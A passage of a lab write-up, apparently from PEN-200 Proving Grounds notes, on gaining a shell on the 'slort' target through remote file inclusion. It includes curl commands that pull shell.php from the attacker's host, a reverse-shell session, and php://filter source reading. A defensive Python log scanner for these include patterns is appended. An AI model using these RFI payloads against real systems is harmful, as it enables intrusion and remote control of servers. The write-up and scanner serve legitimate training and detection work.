RCE
While both web servers on the target, on ports 4443 and 8080, appear identical, both have been identified as vulnerable to LFI and RFI via the page parameter of /site/index.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -s http://$IP:4443/site/index.php?page=http://192.168.45.215/shell.php
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -s http://$IP:8080/site/index.php?page=http://192.168.45.215/shell.php

Sending the payload via RFI to either web server
[screenshot] Hit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ nnc 9999      
listening on [any] 9999 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.134.53] 64191
SOCKET: Shell has connected! PID: 1324
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs\site> whoami
slort\rupert
 
C:\xampp\htdocs\site> hostname
slort
 
C:\xampp\htdocs\site> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.134.53
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.134.254

Initial foothold established on the target system as the rupert user via RFI to RCE
data:// wrapper
[screenshot] Using the PHP data:// wrapper, which REQUIRES the allow_url_include (RFI) option to be enabled
php://filter
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -s 'http://192.168.134.53:8080/site/index.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d
<?php
	$page = null;
	if (isset($_GET["page"])) {
		include($_GET["page"]);
	}
	else {
		echo "ERROR: No page specified...";
		header("Location: index.php?page=main.php", true, 301);
		exit();
	}
?>

php://filter method to read files
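As an added defender-side example (not part of this write-up), a small Python scanner that flags the three include styles used above (remote URL via RFI, php://filter source read, data:// wrapper) in Apache access-log lines. The log lines are constructed, and the labels, regexes and traversal heuristic are my own assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (not from the target): one benign request, then
# the three include styles in the write-up: remote URL, php://filter read, data:// wrapper.
SAMPLE_LOG = """\
192.168.45.215 - - [10/Mar/2024:10:01:02 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.45.215 - - [10/Mar/2024:10:01:09 +0000] "GET /site/index.php?page=http://192.168.45.215/shell.php HTTP/1.1" 200 91 "-" "curl/8.5.0"
192.168.45.215 - - [10/Mar/2024:10:01:15 +0000] "GET /site/index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 376 "-" "curl/8.5.0"
192.168.45.215 - - [10/Mar/2024:10:01:21 +0000] "GET /site/index.php?page=data://text/plain,PLACEHOLDER HTTP/1.1" 200 77 "-" "curl/8.5.0"
"""

# Common log format prefix: client, identd, user, [timestamp], "METHOD target ...", status.
REQUEST_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
SCHEME_RE = re.compile(r"^(?P<scheme>[a-z][a-z0-9+.-]*)://", re.I)
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}


def classify_page_value(value):
    """Label one ?page= value; None means it looks like a plain local file name."""
    v = unquote(value)  # decode a second time so double-encoded wrapper prefixes do not slip past
    m = SCHEME_RE.match(v)
    if m:
        scheme = m.group("scheme").lower()
        if scheme in REMOTE_SCHEMES:
            return "rfi-remote-include"          # only works with allow_url_include=On
        if scheme == "php" and v.lower().startswith("php://filter"):
            return "lfi-php-filter-source-read"  # works even with allow_url_include=Off
        if scheme == "data":
            return "rfi-data-wrapper"            # gated by allow_url_include as well
        return f"lfi-wrapper-{scheme}"           # any other PHP stream wrapper
    if ".." in v or v.startswith(("/", "\\")):
        return "lfi-path-traversal"
    return None


def scan_log(text):
    """Return (client_ip, label, decoded page value) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        for value in query.get("page", []):
            label = classify_page_value(value)
            if label:
                findings.append((m.group("src"), label, unquote(value)))
    return findings
```

Calling scan_log(SAMPLE_LOG) returns one finding per suspicious line, so the benign main.php request is ignored while the RFI, php://filter and data:// requests are each labelled.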